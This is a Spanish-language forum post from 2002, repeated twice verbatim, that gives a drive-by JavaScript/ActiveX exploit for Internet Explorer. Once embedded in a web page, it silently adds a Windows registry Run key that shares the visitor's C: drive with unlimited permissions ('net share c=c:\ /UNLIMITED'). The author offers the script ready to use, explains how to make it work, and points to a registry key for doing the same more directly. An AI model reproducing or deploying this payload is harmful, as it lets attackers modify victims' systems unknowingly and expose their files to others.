MANDALA
06-03-2002, 02:48
Existe una manera de poder añadir claves al registro mediante un código JavaScript, lo que es lo mismo, es posible que al visitar una web, sin darnos cuenta, se estén añadiendo claves potencialmente peligrosas.
Esto es un ejemplo sencillo que reproduce el fallo, introduciendo este códigoen una web, se consigue el efecto deseado, modificando el registro de la víctima.
#script#
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function f() {
try {
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
try {
Shl.RegWrite ("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion \\Run\\share", "cmd.exe /c net share c=c:\ /UNLIMITED");
}
catch(e) {}
}
catch(e) {}
}
setTimeout("f()", 1000);
#/script#
(sustituye los simbolos "#script#" y "#/script#" para ke funcione.
Este sencillo script va a intoducir una clave en el inicio del Windows que hará que se comparta la unidad c:\ con permisos ilimitados, mediante la ejecución del comando:
net share c=c:\ /UNLIMITED
Tal vez no sea la manera mas limpia de compartir una unidad (podríamos haber introducido directamente las claves necesarias en
"HKLM\SYSTEM\CurrentControlSet\Services\lanmanserve r\Shares\Security"
que es la clave del registro que se ocupa de ello), pero si creo que es una manera mucho mas explicativa.
Aunque esto es sólo un ejemplo, hay que recordar para los que no estén muy al dia, que manipulando adecuadamente el registro de un Windows, podemos hacer con ese sistema "casi" cualquier cosa que deseemos.
Esto es un ejemplo sencillo que reproduce el fallo, introduciendo este códigoen una web, se consigue el efecto deseado, modificando el registro de la víctima.
#script#
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function f() {
try {
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
try {
Shl.RegWrite ("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion \\Run\\share", "cmd.exe /c net share c=c:\ /UNLIMITED");
}
catch(e) {}
}
catch(e) {}
}
setTimeout("f()", 1000);
#/script#
(sustituye los simbolos "#script#" y "#/script#" para ke funcione.
Este sencillo script va a intoducir una clave en el inicio del Windows que hará que se comparta la unidad c:\ con permisos ilimitados, mediante la ejecución del comando:
net share c=c:\ /UNLIMITED
Tal vez no sea la manera mas limpia de compartir una unidad (podríamos haber introducido directamente las claves necesarias en
"HKLM\SYSTEM\CurrentControlSet\Services\lanmanserve r\Shares\Security"
que es la clave del registro que se ocupa de ello), pero si creo que es una manera mucho mas explicativa.
Aunque esto es sólo un ejemplo, hay que recordar para los que no estén muy al dia, que manipulando adecuadamente el registro de un Windows, podemos hacer con ese sistema "casi" cualquier cosa que deseemos.